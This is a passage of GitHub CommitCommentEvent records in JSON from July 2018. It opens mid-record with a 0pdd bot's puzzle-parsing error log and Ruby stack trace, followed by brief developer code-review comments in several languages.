bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/ecommerce/img/01.png is a binary file (247355 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/ecommerce/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/search/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/search/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/jstree/throbber.gif is a binary file (1720 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/jstree/40px.png is a binary file (5717 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/jstree/32px.png is a binary file (1562 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/ui-icons_ffffff_256x240.png is a binary file (3264 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/ui-icons_555555_256x240.png is a binary file (3274 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/loading.gif is a binary file (1787 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/ui-icons_444444_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/ui-icons_cc0000_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/ui-bg_flat_0_aaaaaa_40x100.png is a binary file (86 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/ui-icons_777777_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/generic_admin/front/images/ui-icons_777620_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/catalog/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/catalog/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/catalog/views/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/catalog/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/images/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/images/assets/gold.jpg is a binary file (45940 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/images/assets/deer.jpg is a binary file (19044 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/refarm_redirects/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/pages/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/ecommerce/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/search/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/fixtures/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/generic_admin/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/tests/catalog/__init__.py is a binary file (0 bytes)\nReading images/__init__.py...\nReading images/apps.py...\nReading images/templatetags/images.py...\nReading images/migrations/0006_auto_20170418_1615.py...\nReading images/migrations/0005_auto_20170317_1457.py...\nReading images/migrations/0003_auto_20161027_0940.py...\nReading images/migrations/0002_alter_fields.py...\nReading images/migrations/0004_auto_20170124_1444.py...\nReading images/migrations/0001_initial.py...\nReading images/models.py...\nReading docker/.env.dist...\nReading docker/docker-compose.yml...\nReading docker/Dockerfile.python...\nReading refarm_redirects/__init__.py...\nReading refarm_redirects/middleware.py...\nReading refarm_redirects/apps.py...\nReading README.md...\nReading pages/views.py...\nReading pages/__init__.py...\nReading pages/README.md...\nReading pages/management/commands/custom_pages.py...\nReading pages/management/commands/get_app_path_for_gulp.py...\nReading pages/apps.py...\nReading pages/templates/index/index.html...\nReading pages/templates/pages/accordion.html...\nReading pages/templates/pages/breadcrumbs_with_siblings.html...\nReading pages/templates/pages/sitemap.html...\nReading pages/templates/pages/page.html...\nReading pages/templates/pages/breadcrumbs.html...\nReading pages/templates/robots.txt...\nReading pages/utils.py...\nReading pages/urls.py...\nReading pages/templatetags/pages_extras.py...\nReading pages/migrations/0015_add_validation_to_template.py...\nReading pages/migrations/0004_auto_20160909_1100.py...\nReading pages/migrations/0008_add_db_index.py...\nReading pages/migrations/0009_pages_mptt.py...\nReading pages/migrations/0003_auto_20160909_0747.py...\nReading pages/migrations/0005_db_refactor.py...\nReading pages/migrations/0012_auto_20170301_0020.py...\nReading pages/migrations/0006_remove_redundant_fields.py...\nReading pages/migrations/0013_auto_20170317_1457.py...\nReading pages/migrations/0010_rebuild_pages_tree.py...\nReading pages/migrations/0014_auto_20170504_0944.py...\nReading pages/migrations/0002_auto_20160829_1730.py...\nReading pages/migrations/0011_title_to_text_field.py...\nReading pages/migrations/0007_rename_private_field.py...\nReading pages/migrations/0001_initial.py...\nReading pages/models.py...\nReading manage.py...\nReading ecommerce/mailer.py...\nReading ecommerce/views.py...\nReading ecommerce/tasks.py...\nReading ecommerce/admin.py...\nReading ecommerce/README.md...\nReading ecommerce/cart.py...\nReading ecommerce/apps.py...\nReading ecommerce/templates/ecommerce/header_cart.html...\nReading ecommerce/templates/ecommerce/order/backcall_modal.html...\nReading ecommerce/templates/ecommerce/order/success.html...\nReading ecommerce/templates/ecommerce/order/email.html...\nReading ecommerce/templates/ecommerce/order/table_form.html...\nReading ecommerce/templates/ecommerce/order/backcall_email.html...\nReading ecommerce/templates/ecommerce/order/order.html...\nReading ecommerce/urls.py...\nReading ecommerce/front/trackers.es6...\nPuzzle 292-ba927d60 0/DEV at ecommerce/front/trackers.es6\nReading ecommerce/front/paths.js...\nReading ecommerce/front/backcall.es6...\nReading ecommerce/context_processors.py...\nReading ecommerce/migrations/0003_position_vendor_code.py...\nReading ecommerce/migrations/0002_auto_20161123_0936.py...\nReading ecommerce/migrations/0001_initial.py...\nReading ecommerce/models.py...\nReading ecommerce/forms.py...\nReading search/views.py...\nPuzzle 85-5b8190cf 0/DEV at search/views.py\nReading search/search.py...\nReading search/apps.py...\nReading search/templates/search/no_results.html...\nReading search/templates/search/results.html...\nReading search/urls.py...\nReading search/migrations/0001_trigram_search.py...\nReading .gitignore...\nReading generic_admin/views.py...\nReading generic_admin/mixins.py...\nReading generic_admin/inlines.py...\nReading generic_admin/filters.py...\nReading generic_admin/apps.py...\nReading generic_admin/templates/admin/includes/sidebar.html...\nReading generic_admin/templates/admin/change_list.html...\nReading generic_admin/templates/admin/login.html...\nReading generic_admin/templates/admin/change_form.html...\nReading generic_admin/templates/admin/table_editor.html...\nReading generic_admin/templates/admin/base.html...\nReading generic_admin/sites.py...\nReading generic_admin/front/paths.js...\nReading generic_admin/front/css/ui.jqgrid-bootstrap.css...\nReading generic_admin/front/css/jstree.css...\nReading generic_admin/front/css/jquery.webui-popover.css...\nReading generic_admin/front/css/jquery-ui.css...\nReading generic_admin/front/css/admin.css...\nReading generic_admin/front/js/vendors/jquery-ui.min.js...\nReading generic_admin/front/js/vendors/js.cookie.js...\nReading generic_admin/front/js/vendors/jquery.webui-popover.min.js...\nReading generic_admin/front/js/vendors/jstree.min.js...\nReading generic_admin/front/js/vendors/jquery-2.2.3.min.js...\nReading generic_admin/front/js/vendors/jqGrid.locale-ru.js...\nReading generic_admin/front/js/vendors/autocomplete.min.js...\nReading generic_admin/front/js/vendors/jquery.slimscroll.min.js...\nReading generic_admin/front/js/vendors/jqGrid.min.js...\nReading generic_admin/front/js/components/plugins.es6...\nReading generic_admin/front/js/components/tableEditor/autocomplete.es6...\nReading generic_admin/front/js/components/tableEditor/colModel.es6...\nReading generic_admin/front/js/components/tableEditor/filters.es6...\nReading generic_admin/front/js/components/tableEditor/dialogs.es6...\nReading generic_admin/front/js/components/tableEditor/jqGrid.es6...\nReading generic_admin/front/js/components/sidebar.es6...\nReading generic_admin/models.py...\nReading SYSADMIN.md...\nReading .travis.yml...\nReading .editorconfig...\nReading LICENSE...\nReading setup.py...\nReading catalog/apps.py...\nReading catalog/templates/catalog/products_without_content.html...\nReading catalog/templates/catalog/product.html...\nReading catalog/templates/catalog/catalog.html...\nReading catalog/templates/catalog/category.html...\nReading catalog/urls.py...\nReading catalog/templatetags/catalog_extras.py...\nReading catalog/views/catalog.py...\nReading catalog/migrations/0003_auto_20160906_1631.py...\nReading catalog/migrations/0004_merge.py...\nReading catalog/migrations/0005_delete_redundant_models.py...\nReading catalog/migrations/0002_auto_20160829_1731.py...\nReading catalog/migrations/0003_auto_20160909_0755.py...\nReading catalog/migrations/0001_initial.py...\nReading catalog/models.py...\nReading MANIFEST.in...\nReading tests/images/tests.py...\nReading tests/refarm_redirects/test_views.py...\nERROR: tests/refarm_redirects/test_views.py; puzzle at line #1; @todo found, but puzzle can't be parsed, most probably because @todo is not followed by a puzzle marker, as this page explains: https://github.com/yegor256/pdd#how-to-format. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-19T09:06:01Z"}
{"id":"7987837055","type":"CommitCommentEvent","actor":{"login":"nawabahmadreshi"},"repo":{"name":"project-sunbird/project-sunbird.github.io"},"payload":{"comment":{"id":29761302,"position":5,"line":16,"path":"pages/developer-docs/configuring_sunbird/env_variables_content_service.md","commit_id":"17435c9ff5a02a0e7e0c31ed7c14554ca86bd567","created_at":"2018-07-19T09:06:03Z","updated_at":"2018-07-19T09:06:03Z","author_association":"CONTRIBUTOR","body":"its youtube.com, youtu.be"}},"created_at":"2018-07-19T09:06:03Z"}
{"id":"7987837571","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29761305,"position":null,"line":null,"path":null,"commit_id":"45d662c735dc3c6d371f3e3f22733eb9a47ed5d9","created_at":"2018-07-19T09:06:09Z","updated_at":"2018-07-19T09:06:09Z","author_association":"MEMBER","body":"Nice! I guess this even solves https://github.com/HaxeFoundation/haxe/issues/7162 as well / we don't need a `CompletionItemKind.TypeHint` after all? I think at some point you mentioned that would be needed, but I don't really remember why and it seems to work fine without it now:\r\n\r\n![](https://i.imgur.com/Fo7nDhw.png)"}},"created_at":"2018-07-19T09:06:09Z"}
{"id":"7987837620","type":"CommitCommentEvent","actor":{"login":"Dopamineral"},"repo":{"name":"Dopamineral/pubmed_scraper"},"payload":{"comment":{"id":29761306,"position":null,"line":null,"path":null,"commit_id":"a27bff8c68417f65c26fe96ec29e9281bdf8bb3f","created_at":"2018-07-19T09:06:10Z","updated_at":"2018-07-19T09:06:10Z","author_association":"OWNER","body":"Added Try Except clauses to fix bug where less than 20 entries did not sow the \"next\" button on the webpage"}},"created_at":"2018-07-19T09:06:10Z"}
{"id":"7987840502","type":"CommitCommentEvent","actor":{"login":"nawabahmadreshi"},"repo":{"name":"project-sunbird/project-sunbird.github.io"},"payload":{"comment":{"id":29761312,"position":5,"line":16,"path":"pages/developer-docs/configuring_sunbird/env_variables_content_service.md","commit_id":"17435c9ff5a02a0e7e0c31ed7c14554ca86bd567","created_at":"2018-07-19T09:06:42Z","updated_at":"2018-07-19T09:06:42Z","author_association":"CONTRIBUTOR","body":"not like youtube.com.youtu.be"}},"created_at":"2018-07-19T09:06:42Z"}
{"id":"7987842656","type":"CommitCommentEvent","actor":{"login":"shaggysmile"},"repo":{"name":"saidmakh/Education"},"payload":{"comment":{"id":29761315,"position":7,"line":7,"path":"lesson 5/lesson5.js","commit_id":"ce271727f185017688e599b8794f1d4be00b3ddb","created_at":"2018-07-19T09:07:07Z","updated_at":"2018-07-19T09:07:07Z","author_association":"NONE","body":"Wtf???"}},"created_at":"2018-07-19T09:07:07Z"}
{"id":"7987843690","type":"CommitCommentEvent","actor":{"login":"shaggysmile"},"repo":{"name":"saidmakh/Education"},"payload":{"comment":{"id":29761317,"position":8,"line":8,"path":"lesson 5/lesson5.js","commit_id":"ce271727f185017688e599b8794f1d4be00b3ddb","created_at":"2018-07-19T09:07:18Z","updated_at":"2018-07-19T09:07:18Z","author_association":"NONE","body":"Oh my gad!"}},"created_at":"2018-07-19T09:07:18Z"}
{"id":"7987844166","type":"CommitCommentEvent","actor":{"login":"suhuashan"},"repo":{"name":"suhuashan/webpack4.x"},"payload":{"comment":{"id":29761318,"position":null,"line":null,"path":null,"commit_id":"9cb561d227ab9cfc7706b388d9c1772bed513cec","created_at":"2018-07-19T09:07:24Z","updated_at":"2018-07-19T09:07:24Z","author_association":"OWNER","body":"运行npm run build,在根目录下会自动生成dist文件夹，里面放全是打包后的文件；\r\n运行npm run dev在根目录下会自动生成node_modules文件夹，服务端下运行"}},"created_at":"2018-07-19T09:07:24Z"}
{"id":"7987845695","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29761319,"position":12,"line":12,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T09:07:42Z","updated_at":"2018-07-19T09:07:42Z","author_association":"NONE","body":"1. Договорились\r\n2. Сообщество руби отличается особым кол-вом конвенций и идеом, которые используются при написании кода. И любой style-guide начнется с использования 2 пробелов вместо табов\r\nhttps://github.com/rubocop-hq/ruby-style-guide\r\n3. Ну какие-то вещи рассказываются в скринкасте, какими-то мы делимся из собственного опыта"}},"created_at":"2018-07-19T09:07:42Z"}
{"id":"7987846641","type":"CommitCommentEvent","actor":{"login":"qqqays"},"repo":{"name":"XinQiaoF4/xinqiaof4.github.io"},"payload":{"comment":{"id":29761322,"position":null,"line":null,"path":null,"commit_id":"0d93e7451e91d523e49802c27c9013ce3e77a51a","created_at":"2018-07-19T09:07:53Z","updated_at":"2018-07-19T09:07:53Z","author_association":"CONTRIBUTOR","body":"merge"}},"created_at":"2018-07-19T09:07:53Z"}
{"id":"7987847672","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29761325,"position":26,"line":1555,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-19T09:08:05Z","updated_at":"2018-07-19T09:08:05Z","author_association":"OWNER","body":"Hmm, juste pour clarifier, je laisse ce mux et j'enleve la gestoin du bit dans le driver vid_pll ?"}},"created_at":"2018-07-19T09:08:05Z"}
{"id":"7987853611","type":"CommitCommentEvent","actor":{"login":"NeoWorkPage"},"repo":{"name":"TonyGermaneri/canvas-datagrid"},"payload":{"comment":{"id":29761338,"position":null,"line":null,"path":null,"commit_id":"1533c1d3e8e07056852d6bc4bf3da2a908eaffb6","created_at":"2018-07-19T09:09:10Z","updated_at":"2018-07-19T09:09:10Z","author_association":"NONE","body":"after updating appeared bug in Input component.  \r\n![2018-07-19 12 06 47](https://user-images.githubusercontent.com/25130499/42933045-7b7580fe-8b4c-11e8-881d-3adcf0a6b492.png)\r\n\r\nplayback problems: https://github.com/NeoWorkPage/canvas-datagrid/commit/f60d2ed88d3acb31cb9e1dd8968e79f4c49c7c38"}},"created_at":"2018-07-19T09:09:10Z"}
{"id":"7987853785","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29761339,"position":26,"line":1555,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-19T09:09:12Z","updated_at":"2018-07-19T09:09:12Z","author_association":"NONE","body":"Oui, plus on decompose en element standard, mieux c'est je pense"}},"created_at":"2018-07-19T09:09:12Z"}
{"id":"7987857694","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29761351,"position":26,"line":1555,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-19T09:09:55Z","updated_at":"2018-07-19T09:09:55Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-19T09:09:55Z"}
{"id":"7987859575","type":"CommitCommentEvent","actor":{"login":"graingert"},"repo":{"name":"mozilla-services/react-jsonschema-form"},"payload":{"comment":{"id":29761360,"position":6,"line":48,"path":"package.json","commit_id":"b2e57779b3b2be6893a1b44156e1024016b9b8aa","created_at":"2018-07-19T09:10:15Z","updated_at":"2018-07-19T09:10:15Z","author_association":"NONE","body":"This doesn't actually remove growl 1.9, because mocha depends explicitly on growl 1.9:\r\n\r\nhttps://github.com/graingert/react-jsonschema-form/blob/bffc38c12182e7afcec734687c03d441cd3f790c/package-lock.json#L4800-L4816\r\n\r\nReverted here: https://github.com/mozilla-services/react-jsonschema-form/pull/983"}},"created_at":"2018-07-19T09:10:15Z"}
{"id":"7987863485","type":"CommitCommentEvent","actor":{"login":"yangke687"},"repo":{"name":"yangke687/react-cnode-teach"},"payload":{"comment":{"id":29761376,"position":null,"line":null,"path":null,"commit_id":"315759a0799ffcd5b8b4985023aaa9df92a61bb8","created_at":"2018-07-19T09:10:56Z","updated_at":"2018-07-19T09:10:56Z","author_association":"OWNER","body":"React ContextTypes 从父组件传递值到子组件"}},"created_at":"2018-07-19T09:10:56Z"}
{"id":"7987866508","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29761381,"position":27,"line":27,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T09:11:29Z","updated_at":"2018-07-19T09:11:29Z","author_association":"NONE","body":"![screen shot 2018-07-19 at 12 10 15 pm](https://user-images.githubusercontent.com/8184396/42933164-c4182fb4-8b4c-11e8-99f5-25aadb5ca68d.png)\r\nтам 2 умножить на а, а не делить. "}},"created_at":"2018-07-19T09:11:29Z"}
{"id":"7987871295","type":"CommitCommentEvent","actor":{"login":"sarathi475"},"repo":{"name":"sarathikathirvel/code_exercise"},"payload":{"comment":{"id":29761392,"position":null,"line":null,"path":null,"commit_id":"12e800ba30a77a7d90f28d45b6a5059245accf96","created_at":"2018-07-19T09:12:20Z","updated_at":"2018-07-19T09:12:20Z","author_association":"CONTRIBUTOR","body":"Okay\n\nOn Thu 19 Jul, 2018, 2:26 PM Mutharasu Gnanavel, <notifications@github.com>\nwrote:\n\n> Also remove the function program from here, since that's our propitiatory\n> source code we should not disclose to the public.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sarathikathirvel/code_exercise/commit/12e800ba30a77a7d90f28d45b6a5059245accf96#commitcomment-29761197>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AG8Ta78vG11tGiwE9OVjC9krDJhidz1aks5uIEm1gaJpZM4VWAYO>\n> .\n>\n"}},"created_at":"2018-07-19T09:12:20Z"}
{"id":"7987879903","type":"CommitCommentEvent","actor":{"login":"dizzyplay"},"repo":{"name":"DasomL/practice_likethis"},"payload":{"comment":{"id":29761409,"position":null,"line":null,"path":null,"commit_id":"3b5275fc838b6fd0b82e1958ad963dc69e61dbb1","created_at":"2018-07-19T09:13:53Z","updated_at":"2018-07-19T09:13:53Z","author_association":"NONE","body":"수정사항 반영 완료 "}},"created_at":"2018-07-19T09:13:53Z"}
{"id":"7987884338","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29761417,"position":4,"line":161,"path":"graphics/macgui/macwindowmanager.cpp","commit_id":"e1460103e195d788dfa0e0cf8bbe57f0afae466f","created_at":"2018-07-19T09:14:40Z","updated_at":"2018-07-19T09:14:40Z","author_association":"MEMBER","body":"You have to initialize _engine too."}},"created_at":"2018-07-19T09:14:40Z"}
{"id":"7987886027","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":29761421,"position":null,"line":null,"path":null,"commit_id":"ceaac988473481fc56cfbfc84f914289ff79fb37","created_at":"2018-07-19T09:14:59Z","updated_at":"2018-07-19T09:14:59Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-19T09:14:59Z"}
{"id":"7987888118","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29761433,"position":434,"line":1963,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-19T09:15:22Z","updated_at":"2018-07-19T09:15:22Z","author_association":"OWNER","body":"Oui, mais est-ce que le clk_disable/enable se propage a a travers les fixed_dividors ?"}},"created_at":"2018-07-19T09:15:22Z"}
{"id":"7987888689","type":"CommitCommentEvent","actor":{"login":"mrkev"},"repo":{"name":"facebook/flow"},"payload":{"comment":{"id":29761435,"position":null,"line":null,"path":null,"commit_id":"19acbcf91fb03be04b167900211b25d18620cba3","created_at":"2018-07-19T09:15:29Z","updated_at":"2018-07-19T09:15:29Z","author_association":"CONTRIBUTOR","body":"Someone on the flow team edited this PR-- I have little context on profiling. Apparently profiling is dummied out on Windows anyway or something ¯\\_(ツ)_/¯ "}},"created_at":"2018-07-19T09:15:29Z"}
{"id":"7987888692","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29761436,"position":4,"line":78,"path":"engines/pink/pink.cpp","commit_id":"a053a19ca258dc4d344bc2345b5faa1bf2b0183e","created_at":"2018-07-19T09:15:29Z","updated_at":"2018-07-19T09:15:29Z","author_association":"MEMBER","body":"Would be better if instead of making these variables public, you create a method setEnginaPauseCallback() in WindowManager."}},"created_at":"2018-07-19T09:15:29Z"}
{"id":"7987890181","type":"CommitCommentEvent","actor":{"login":"fgravin"},"repo":{"name":"camptocamp/ngeo"},"payload":{"comment":{"id":29761439,"position":39,"line":120,"path":"src/offline/Downloader.js","commit_id":"06be0f95959d36aca83bcbc3d2599f85a3f121b0","created_at":"2018-07-19T09:15:45Z","updated_at":"2018-07-19T09:15:45Z","author_association":"MEMBER","body":"@gberaudo \r\n`layerItem.tiles`: `tiles` property is not defined in `OfflineLayerMetadata` type."}},"created_at":"2018-07-19T09:15:45Z"}
{"id":"7987890550","type":"CommitCommentEvent","actor":{"login":"PTGitHubber"},"repo":{"name":"bitfocus/companion"},"payload":{"comment":{"id":29761440,"position":null,"line":null,"path":null,"commit_id":"f23a3b05560c8fc4270467e5a93882f61f2659ea","created_at":"2018-07-19T09:15:49Z","updated_at":"2018-07-19T09:15:49Z","author_association":"NONE","body":"Should I try it out tomorrow? With those targets fixed, I have a feeling that it's going to be fine!"}},"created_at":"2018-07-19T09:15:49Z"}
